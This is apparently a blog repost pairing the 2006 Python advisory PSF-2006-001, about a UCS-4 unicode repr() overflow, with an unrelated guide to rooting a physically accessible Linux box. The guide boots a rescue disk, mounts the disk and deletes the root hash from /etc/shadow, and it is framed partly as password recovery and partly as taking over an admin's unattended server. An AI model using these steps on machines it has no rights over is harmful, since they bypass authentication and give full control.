IT_Solution for Learning

Python Security Advisory


Advisory ID: PSF-2006-001
Issue Date: October 12, 2006
Product: Python
Versions: 2.2, 2.3 prior to 2.3.6, 2.4 prior to 2.4.4, wide unicode (UCS-4) builds only
CVE Names: CAN-2006-4980

Python is an interpreted, interactive, object-oriented programming language. It is often compared to Tcl, Perl, Scheme or Java.

The Python development team has discovered a flaw in the repr() implementation of Unicode string objects which can lead to execution of arbitrary code due to an overflow in a buffer allocated with insufficient size.

The flaw only manifests itself in Python builds configured to support UCS-4 Unicode strings (using the --enable-unicode=ucs4 configure flag). This is still not the default, which is why the vulnerability should not be present in most Python builds out there, especially not the builds for the Windows or Mac OS X platform provided by www.python.org.

You can find out whether you are running a UCS-4 enabled build by looking at the sys.maxunicode attribute: it is 65535 in a UCS-2 build and 1114111 in a UCS-4 build.

More information can be found in this posting to the python-dev mailing list: http://mail.python.org/pipermail/python-dev/2006-October/069260.html

The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CAN-2006-4980 to this issue.

Python 2.4.4 and Python 2.3.6 are available from www.python.org and contain a fix for this issue. Python 2.5 also contains the fix and is not vulnerable.

Patches for Python 2.2, 2.3 and 2.4 are also immediately available:

* http://python.org/files/news/security/PSF-2006-001/patch-2.3.txt (Python 2.2, 2.3)
* http://python.org/files/news/security/PSF-2006-001/patch-2.4.txt (Python 2.4)

Acknowledgement: thanks to Benjamin C. Wiley Sittler for discovering this issue.

reference:python.org

You have lost your root password on your linux box and now you consider formatting
everythign to regain control? Your admin is a moron that leaves the server available
physically for everybody? You wanna test your Linux box? Don’t worry if you have at least
a floppy rescue disk under hand,you can root it ;-) )

The problem with the new version of Linux since 6.2 is :

a)the shadow suit that is installed by default (masking the password in the shadow file)

b)the md5 encryption ( 34 characters vs 13 for standard DES) so it’s not as easy as it was
in teh previous versions i.e. to simply get the /etc/passwd file and running JtR against it
doesn’t work anymore.

What to do now? Follow the guide :

1- Boot with a rescue disk

2- type the appropriate key to get into rescue mode (ex.F4)

3- linux rescue (to get into this mode)

4- $ mknod /dev/hda (to create a virtual HD)

* * * N o t e * * *

If you have more than one partition on your HD, check which one is the Linux partition:

A- $ fdisk /dev/hda

B-( fdisk) : p (to show the current partitions) : m (for commands)

5- $ mknod /dev/hda2 ( create the partition2 device if you have a DOS partition as primary
partition for example)

6- $ mkdir /data (to create a virtual directory in the RAM drive)

7- $ mount -t ext2 /dev/hda2 /data ( to mount the files in the virtual dir located in the
RAM drive)

8-$ cd /data/etc

9- $ chmod 700 /data/etc/shadow
or $ chmod u+w /data/etc/shadow ( to gain write access on the shadow file)

10-$ /data/bin/vi /data/etc/shadow (to edit the shadow file with VI editor)

11- type i to insert then remove the root password by positionning the cursor on the
characters and type the x key

12- type escape key then ” : ”

13- save the file with : wq!

At this point, everything you have done is in RAM and nothing is done on the HD so DON’T
REBOOT YET!!

14- $ cd / (to return back to /)

15- $ umount /data

16- $ init 0 (rebooting the system)

Now you can log in as root; there is no password protecting root anymore.

Take care everyone, Just1ce.

reference:http://www.exploitx.com/69/rooting-linux-with-a-floppy/